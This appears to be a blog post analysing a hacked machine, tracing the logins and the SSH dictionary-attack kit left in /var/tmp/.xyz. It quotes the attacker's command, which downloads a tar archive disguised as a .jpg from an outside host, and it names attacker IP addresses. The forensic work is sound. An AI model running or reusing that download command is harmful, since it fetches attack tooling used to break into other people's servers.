The first login came from 64.37.51.41. I'm guessing that this computer is one of the infected computers. I got two logins from 90.168.11.25, probably as a test. After that, I got 55 logins from 89.123.236.103. It appears that is the ip address of the command/control server. That ip shows up on a honeypot website as being near a known spammer.
From looking at the bash history, the user downloaded the attack software from skilandat.de. It has a .jpg extension, but it is a tar file.
wget skilandat.de/srg/xyz.jpg;tar xvf xyz.jpg;rm -rf xyz.jpg
The xyz attack was in /var/tmp/.xyz. It uses a dictionary attack against blocks of ip addresses. The successful ssh's from the scan go into trueusers.txt. The file on my compute currently has 28 ip/user/password combinations. The bash history shows that the attacker used my machine to ssh to a few of the successful hosts.
Here is the contents of the /var/tmp/.xyz folder:
ls -la total 14188 drwxr-xr-x 2 vm vm 4096 Jan 12 14:28 . drwxrwxrwt 7 root root 4096 Jan 14 16:48 .. -rwxr-xr-x 1 vm vm 205 Jan 18 2011 a -rwxr-xr-x 1 vm vm 3350 Jan 18 2011 mass -rw-r--r-- 1 vm vm 11886058 Jan 18 2011 passfile -rwxr-xr-x 1 vm vm 167964 Jan 18 2011 pico -rwxr-xr-x 1 vm vm 5944 Jan 18 2011 pscan2 -rw-r--r-- 1 vm vm 5784 Jan 18 2011 pscan2.c -rwxr-xr-x 1 vm vm 659 Mar 5 2012 rand -rw-r--r-- 1 vm vm 0 Jan 11 19:12 scan.log -rwxr-xr-x 1 vm vm 719860 Jan 18 2011 scanner -rwxr-xr-x 1 vm vm 1446381 Jan 18 2011 scanssh -rwxr-xr-x 1 vm vm 249980 Jan 18 2011 screen -rw-r--r-- 1 vm vm 726 Jan 11 19:09 trueusers.txt -rwxr-xr-x 1 vm vm 205 Jan 18 2011 x
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.